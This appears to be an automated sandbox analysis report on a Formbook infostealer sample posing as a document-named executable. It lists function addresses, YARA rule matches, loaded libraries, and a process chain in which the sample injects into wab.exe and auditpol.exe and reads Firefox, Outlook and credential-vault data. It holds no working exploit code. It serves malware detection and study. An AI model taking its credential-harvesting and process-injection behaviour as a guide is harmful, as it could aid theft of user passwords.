Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FA118	10_2_036FA118
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037181CC	10_2_037181CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366B1B0	10_2_0366B1B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037201AA	10_2_037201AA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F0E0	10_2_0371F0E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037170E9	10_2_037170E9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036670C0	10_2_036670C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370F0CC	10_2_0370F0CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660770	10_2_03660770
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03684750	10_2_03684750
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365C7C0	10_2_0365C7C0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F7B0	10_2_0371F7B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367C6E0	10_2_0367C6E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_037116CC	10_2_037116CC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717571	10_2_03717571
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660535	10_2_03660535
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FD5B0	10_2_036FD5B0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03720591	10_2_03720591
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03651460	10_2_03651460
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03712446	10_2_03712446
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371F43F	10_2_0371F43F
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370E4F6	10_2_0370E4F6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FB76	10_2_0371FB76
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371AB40	10_2_0371AB40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0369DBF9	10_2_0369DBF9
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D5BF0	10_2_036D5BF0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03716BD7	10_2_03716BD7
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367FB80	10_2_0367FB80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D3A6C	10_2_036D3A6C
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717A46	10_2_03717A46
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FA49	10_2_0371FA49
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0370DAC6	10_2_0370DAC6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036FDAAC	10_2_036FDAAC
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A5AA0	10_2_036A5AA0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365EA80	10_2_0365EA80
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03676962	10_2_03676962
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03669950	10_2_03669950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367B950	10_2_0367B950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036629A0	10_2_036629A0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0372A9A6	10_2_0372A9A6
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03662840	10_2_03662840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366A840	10_2_0366A840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036CD800	10_2_036CD800
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036638E0	10_2_036638E0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0368E8F0	10_2_0368E8F0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036468B8	10_2_036468B8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D4F40	10_2_036D4F40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036A2F28	10_2_036A2F28
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03680F30	10_2_03680F30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FF09	10_2_0371FF09
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03652FC8	10_2_03652FC8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FFB1	10_2_0371FFB1
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03661F92	10_2_03661F92
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660E59	10_2_03660E59
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371EE26	10_2_0371EE26
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371EEDB	10_2_0371EEDB
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03669EB0	10_2_03669EB0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371CE93	10_2_0371CE93
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03672E90	10_2_03672E90
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03717D73	10_2_03717D73
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03663D40	10_2_03663D40
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03711D5A	10_2_03711D5A
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0366AD00	10_2_0366AD00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0365ADE0	10_2_0365ADE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0367FDC0	10_2_0367FDC0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03678DBF	10_2_03678DBF
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_036D9C32	10_2_036D9C32
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03660C00	10_2_03660C00
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0371FCF2	10_2_0371FCF2
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03650CF2	10_2_03650CF2
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_03700CB5	10_2_03700CB5
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B1950	10_2_029B1950
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B3230	10_2_029B3230
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B322B	10_2_029B322B
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029B5060	10_2_029B5060
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029A1125	10_2_029A1125
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029CB750	10_2_029CB750
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AAADA	10_2_029AAADA
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AAAE0	10_2_029AAAE0
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029ACA60	10_2_029ACA60
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_029AC840	10_2_029AC840
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E354	10_2_0347E354
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E238	10_2_0347E238
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347D758	10_2_0347D758
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347D725	10_2_0347D725
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347E6F8	10_2_0347E6F8
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0348543F	10_2_0348543F
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 10_2_0347CA03	10_2_0347CA03

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EEEA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EFF290 appears 103 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EC7E54 appears 85 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02EB5130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: String function: 02E6B970 appears 248 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036DF290 appears 103 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 03695130 appears 36 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036CEA12 appears 86 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 0364B970 appears 250 times
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: String function: 036A7E54 appears 93 times

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: No import functions for PE file found

Source: RN# D7521-RN-00353 REV-2.exe, 00000000.00000000.1680263736.000001C076C42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTransponer.exe6 vs RN# D7521-RN-00353 REV-2.exe
Source: RN# D7521-RN-00353 REV-2.exe	Binary or memory string: OriginalFilenameTransponer.exe6 vs RN# D7521-RN-00353 REV-2.exe

Source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@18/10

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6796

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\068f4681-e80d-4f97-9389-23d357d68730

Jump to behavior

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: RN# D7521-RN-00353 REV-2.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: auditpol.exe, 0000000A.00000002.4129063317.0000000003045000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2193504350.0000000003045000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

File read: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Process created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: auditpolcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\auditpol.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\auditpol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: RN# D7521-RN-00353 REV-2.exe

Static file information: File size 2061855 > 1048576

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uIklAoJgpkP.exe, 00000009.00000002.4128841533.000000000085E000.00000002.00000001.01000000.00000008.sdmp, uIklAoJgpkP.exe, 0000000B.00000000.2079950190.000000000085E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: auditpol.pdbGCTL source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbMicrosoft.VisualBasic.ni.dllMZ source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: auditpol.pdb source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF40C.tmp.dmp.5.dr
